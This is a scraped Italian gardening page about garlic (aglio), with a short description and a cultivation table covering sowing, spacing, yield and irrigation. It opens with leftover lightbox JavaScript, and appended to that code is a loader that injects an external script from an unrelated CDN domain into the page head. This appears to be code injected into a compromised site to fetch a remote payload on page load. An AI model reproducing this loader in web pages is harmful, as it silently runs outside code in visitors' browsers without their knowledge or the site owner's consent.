, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

Aglio

L’aglio è un ortaggio usato per il condimento fin dai tempi antichi. È una specie erbacea perenne con numerose radici superficiali. È una specie adatta a climi temperati con basse esigenze termiche, preferisce terreni permeabili, ben drenati con un pH compreso tra 6 e 7, con bassa salinità e buona disponibilità di sostanza organica. Le cultivar fanno capo a due tipi principali: aglio bianco o comune e aglio rosa o precoce.*

aglio
Specie:Allium sativum
Periodo di semina:ott, nov, dic
Cosa mettere:bulbilli
Periodo di raccolta:giu, lug
Distanza tra file:30 cm / 50 cm
Distanza su file:10 cm / 15 cm
Durata media coltivazione:140 gg / 160 gg
Produzione per mq:0,50 kg / 1.50 kg
Durata dell'irrigazione min:8 minuti
Durata dell'irrigazione max:18 minuti

*Romano Tesi, Principi di orticoltura e ortaggi d’Italia, Edagricole, 1987